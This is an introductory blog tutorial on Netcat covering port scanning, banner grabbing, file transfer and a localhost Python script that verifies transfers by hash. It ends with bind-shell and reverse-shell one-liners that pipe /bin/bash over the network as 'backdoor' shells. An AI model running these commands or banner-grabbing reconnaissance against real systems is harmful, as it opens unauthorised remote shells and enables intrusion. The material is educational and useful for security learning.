Netcat: Hacker’s “Swiss Army Knife”
Netcat, released in 1996, is a networking program designed to read and write data across Transmission Control Protocol (TCP) and User Datagram Protocol (UDP) connections. It is often referred to as the “Swiss Army Knife” of networking. Netcat is useful both as a standalone program and as a back-end tool driven by scripts and other programs. It can be used for port scanning, transferring files, banner grabbing, port listening, redirection and more.
The goal of this blog is to provide you with a basic understanding of Netcat.
netcat -h
Shows all the options available. Depending on which variant is installed, the syntax is one of:
ncat -h
nc -h
netcat -h
nc -v -w 2 -z 192.168.1.10 20-80
Here -v enables verbose mode, -w 2 sets a 2-second timeout for connects, -z selects scanning mode (connect without sending any data), and nc will try connecting to every port between 20 and 80.
Even though Netcat can be used for port scanning, it isn’t its strength. A tool such as Nmap is better suited for port scanning.
The randomize ports switch (-r) can be used to choose port numbers randomly within the range.
Banner grabbing is an enumeration technique designed to determine the brand, version, operating system, or other relevant information about a particular service or application. This is especially important if you are looking for a vulnerability associated with a particular version of some service. We can use nc to grab port banners in the following way:
nc -v 192.168.1.10 80
Push a file from client to the listener:
nc -l -p [LocalPort] > [outfile]
Listen on [LocalPort], store received data in [outfile]
nc -w3 [TargetIPaddr] [port] < [infile]
Push [infile] to [TargetIPaddr] on [port]
Pull a file from listener back to the client:
nc -l -p [LocalPort] < [infile]
Listen on [LocalPort], prepared to push [infile]
nc -w3 [TargetIPaddr] [port] > [outfile]
Connect to [TargetIPaddr] on [port] and save the received file as [outfile]
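The nc transfer above moves bytes but gives no confirmation that the file arrived complete and unchanged. As an added example (not the post's own commands, and not part of Netcat), the Python below reproduces the push direction over 127.0.0.1, a receiver writing to [outfile] and a sender streaming [infile], and then compares SHA-256 digests of both files, which is the check a practitioner adds after an nc transfer (with nc itself, the equivalent is running `sha256sum` on both ends and comparing the output). The file contents, file names and ports are constructed, and the `tamper` flag exists only to show the check firing.

```python
import hashlib
import socket
import tempfile
import threading
from pathlib import Path

CHUNK = 65536


def sha256_file(path):
    """Digest a file in chunks; this is the value `sha256sum [file]` prints."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(CHUNK), b""):
            h.update(chunk)
    return h.hexdigest()


def start_receiver(outfile):
    """Mirror of `nc -l -p [LocalPort] > [outfile]`: accept one connection on
    127.0.0.1 and write everything received to outfile until the sender closes.
    Returns (port, thread); join the thread to know the transfer has finished."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    def serve():
        conn, _ = srv.accept()
        srv.close()  # single-shot listener, like nc -l without -k
        with conn, open(outfile, "wb") as f:
            while True:
                chunk = conn.recv(CHUNK)
                if not chunk:  # EOF: sender did shutdown(SHUT_WR) or closed
                    break
                f.write(chunk)

    t = threading.Thread(target=serve, daemon=True)
    t.start()
    return port, t


def push_file(host, port, infile, timeout=3.0):
    """Mirror of `nc -w3 [TargetIPaddr] [port] < [infile]`: stream the file and
    close the write side so the receiver sees EOF (the -w3 is the timeout)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        with open(infile, "rb") as f:
            for chunk in iter(lambda: f.read(CHUNK), b""):
                s.sendall(chunk)
        s.shutdown(socket.SHUT_WR)


def transfer_and_verify(infile, outfile, tamper=False):
    """Push infile to a local receiver writing outfile, then compare digests.
    `tamper` flips one byte of the received copy to show the check failing."""
    port, receiver = start_receiver(outfile)
    push_file("127.0.0.1", port, infile)
    receiver.join(timeout=10)
    if tamper:
        data = bytearray(Path(outfile).read_bytes())
        data[0] ^= 0x01
        Path(outfile).write_bytes(data)
    return sha256_file(infile) == sha256_file(outfile)


def demo(tamper=False):
    """Constructed input: a temporary file of repeated sample text."""
    tmp = Path(tempfile.mkdtemp())
    src, dst = tmp / "infile.bin", tmp / "outfile.bin"
    src.write_bytes(b"constructed sample payload line\n" * 4096)
    return transfer_and_verify(src, dst, tamper=tamper)


if __name__ == "__main__":
    print("intact transfer verified:", demo())
    print("tampered copy detected:", not demo(tamper=True))
```

Two things the code makes visible that the one-line nc commands hide: the receiver only knows the file is complete when the sender closes its write side, so a sender that is killed mid-transfer leaves a truncated [outfile] with no error, and nothing in the transfer itself authenticates or protects the bytes in transit. The digest comparison catches truncation and corruption; it only catches deliberate modification if the digest is exchanged over a channel the sender trusts rather than alongside the file.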
Listening backdoor shell on Linux:
nc -l -p [LocalPort] -e /bin/bash
Creates a shell on local port [LocalPort] that can then be accessed using a basic Netcat client
Reverse backdoor shell on Linux:
nc [YourIPaddr] [port] -e /bin/bash
Creates a reverse shell that will attempt to connect to [YourIPaddr] on port [port]. This shell can then be captured using a basic nc listener